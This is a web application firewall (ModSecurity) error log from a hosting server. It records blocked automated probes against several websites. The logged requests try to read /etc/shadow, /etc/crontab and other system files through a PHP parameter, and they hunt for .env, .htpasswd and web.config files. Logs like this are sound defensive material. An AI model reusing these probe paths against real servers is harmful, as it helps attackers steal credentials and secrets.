[Mon May 11 12:02:14.124983 2026] [security2:error] [pid 1254242:tid 1254252] [client 216.73.216.110:13980] ModSecurity: Warning. Matched phrase "etc/crontab" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/crontab found within ARGS:filesrc: /etc/crontab"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpJr4KNmD_mZ_vlf89BgAAAEc"]
[Mon May 11 12:02:14.125609 2026] [security2:error] [pid 1254242:tid 1254252] [client 216.73.216.110:13980] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpJr4KNmD_mZ_vlf89BgAAAEc"]
[Mon May 11 12:02:14.226295 2026] [security2:error] [pid 1254242:tid 1254252] [client 216.73.216.110:13980] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpJr4KNmD_mZ_vlf89BgAAAEc"]
[Mon May 11 12:02:14.480365 2026] [security2:error] [pid 1254179:tid 1254189] [client 185.177.72.9:7238] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpJWS6k_SCYd1AVZqxuAAAAQg"]
[Mon May 11 12:02:14.505560 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:7240] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /digitalocean/.env.production2023"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/digitalocean/.env.production2023"] [unique_id "agGpJpkIEwRJMyDaV55RSwAAAUk"]
[Mon May 11 12:02:14.505769 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:7240] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/digitalocean/.env.production2023"] [unique_id "agGpJpkIEwRJMyDaV55RSwAAAUk"]
[Mon May 11 12:02:15.710642 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:7240] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpJpkIEwRJMyDaV55RSwAAAUk"]
[Mon May 11 12:02:15.736797 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:7246] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /digitalocean/.htpasswd1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/digitalocean/.htpasswd1"] [unique_id "agGpJ2S6k_SCYd1AVZqxugAAAQU"]
[Mon May 11 12:02:15.737002 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:7246] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/digitalocean/.htpasswd1"] [unique_id "agGpJ2S6k_SCYd1AVZqxugAAAQU"]
[Mon May 11 12:02:16.905365 2026] [security2:error] [pid 1254179:tid 1254186] [client 185.177.72.9:7246] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpJ2S6k_SCYd1AVZqxugAAAQU"]
[Mon May 11 12:02:16.933099 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:7260] ModSecurity: Warning. Matched phrase ".htpasswd" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: .htpasswd found within REQUEST_FILENAME: /digitalocean/.htpasswd1"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/digitalocean/.htpasswd1"] [unique_id "agGpKBjZymfuKpjWXeiAaQAAAM0"]
[Mon May 11 12:02:16.933346 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:7260] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/digitalocean/.htpasswd1"] [unique_id "agGpKBjZymfuKpjWXeiAaQAAAM0"]
[Mon May 11 12:02:18.161256 2026] [security2:error] [pid 1254133:tid 1254149] [client 185.177.72.9:7260] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpKBjZymfuKpjWXeiAaQAAAM0"]
[Mon May 11 12:02:20.759831 2026] [security2:error] [pid 1254212:tid 1254220] [client 216.73.216.110:40450] ModSecurity: Warning. Matched phrase "etc/shadow" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/shadow found within ARGS:filesrc: /etc/shadow.nouids.cache"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpLEYQeUtAPynIs6xcDgAAAAY"]
[Mon May 11 12:02:20.760461 2026] [security2:error] [pid 1254212:tid 1254220] [client 216.73.216.110:40450] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpLEYQeUtAPynIs6xcDgAAAAY"]
[Mon May 11 12:02:20.817780 2026] [security2:error] [pid 1254212:tid 1254220] [client 216.73.216.110:40450] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpLEYQeUtAPynIs6xcDgAAAAY"]
[Mon May 11 12:02:24.041017 2026] [security2:error] [pid 1254212:tid 1254215] [client 43.135.142.7:39698] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "cpanel.totalcloud.fr"] [uri "/"] [unique_id "agGpMEYQeUtAPynIs6xcDwAAAAE"]
[Mon May 11 12:02:39.914489 2026] [security2:error] [pid 1254133:tid 1254160] [client 216.73.216.110:41232] ModSecurity: Warning. Matched phrase "etc/default/grub" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: etc/default/grub found within ARGS:filesrc: /etc/default/grub"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpPxjZymfuKpjWXeiAtgAAANg"]
[Mon May 11 12:02:39.915338 2026] [security2:error] [pid 1254133:tid 1254160] [client 216.73.216.110:41232] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agGpPxjZymfuKpjWXeiAtgAAANg"]
[Mon May 11 12:02:39.970104 2026] [security2:error] [pid 1254133:tid 1254160] [client 216.73.216.110:41232] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpPxjZymfuKpjWXeiAtgAAANg"]
[Mon May 11 12:02:46.446280 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:21646] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /django/web.config.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/django/web.config.alpha"] [unique_id "agGpRpkIEwRJMyDaV55RdgAAAUk"]
[Mon May 11 12:02:46.446480 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:21646] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/django/web.config.alpha"] [unique_id "agGpRpkIEwRJMyDaV55RdgAAAUk"]
[Mon May 11 12:02:47.637031 2026] [security2:error] [pid 1256241:tid 1256255] [client 185.177.72.9:21646] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpRpkIEwRJMyDaV55RdgAAAUk"]
[Mon May 11 12:02:47.662672 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:21648] ModSecurity: Warning. Matched phrase "/Web.config" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /Web.config found within REQUEST_FILENAME: /django/web.config.alpha"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/django/web.config.alpha"] [unique_id "agGpR5kIEwRJMyDaV55RgQAAAU8"]
[Mon May 11 12:02:47.662877 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:21648] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/django/web.config.alpha"] [unique_id "agGpR5kIEwRJMyDaV55RgQAAAU8"]
[Mon May 11 12:02:48.868000 2026] [security2:error] [pid 1256241:tid 1256261] [client 185.177.72.9:21648] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpR5kIEwRJMyDaV55RgQAAAU8"]
[Mon May 11 12:03:03.301943 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:27258] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /documents/.env.old-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/documents/.env.old-hotfix"] [unique_id "agGpV2S6k_SCYd1AVZqx3wAAARQ"]
[Mon May 11 12:03:03.305444 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:27258] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/documents/.env.old-hotfix"] [unique_id "agGpV2S6k_SCYd1AVZqx3wAAARQ"]
[Mon May 11 12:03:04.503120 2026] [security2:error] [pid 1254179:tid 1254201] [client 185.177.72.9:27258] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpV2S6k_SCYd1AVZqx3wAAARQ"]
[Mon May 11 12:03:04.530673 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:27264] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /documents/.env.old-hotfix"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/documents/.env.old-hotfix"] [unique_id "agGpWEYQeUtAPynIs6xcPgAAAAI"]
[Mon May 11 12:03:04.530826 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:27264] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/documents/.env.old-hotfix"] [unique_id "agGpWEYQeUtAPynIs6xcPgAAAAI"]
[Mon May 11 12:03:05.741692 2026] [security2:error] [pid 1254212:tid 1254216] [client 185.177.72.9:27264] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpWEYQeUtAPynIs6xcPgAAAAI"]
[Mon May 11 12:03:10.582988 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:27316] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dotnet/.env.testing.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/dotnet/.env.testing.archived"] [unique_id "agGpXkYQeUtAPynIs6xcRQAAAAo"]
[Mon May 11 12:03:10.587455 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:27316] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/dotnet/.env.testing.archived"] [unique_id "agGpXkYQeUtAPynIs6xcRQAAAAo"]
[Mon May 11 12:03:11.737390 2026] [security2:error] [pid 1254212:tid 1254224] [client 185.177.72.9:27316] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpXkYQeUtAPynIs6xcRQAAAAo"]
[Mon May 11 12:03:11.764193 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:27328] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dotnet/.env.testing.archived"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.jeanboyault.fr"] [uri "/dotnet/.env.testing.archived"] [unique_id "agGpX2S6k_SCYd1AVZqx4wAAARA"]
[Mon May 11 12:03:11.764480 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:27328] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.jeanboyault.fr"] [uri "/dotnet/.env.testing.archived"] [unique_id "agGpX2S6k_SCYd1AVZqx4wAAARA"]
[Mon May 11 12:03:12.956302 2026] [security2:error] [pid 1254179:tid 1254197] [client 185.177.72.9:27328] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "www.jeanboyault.fr"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agGpX2S6k_SCYd1AVZqx4wAAARA"]
[Mon May 11 12:03:24.109022 2026] [authz_core:error] [pid 1254242:tid 1254261] [client 95.111.239.37:55062] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/error_log, referer: binance.com
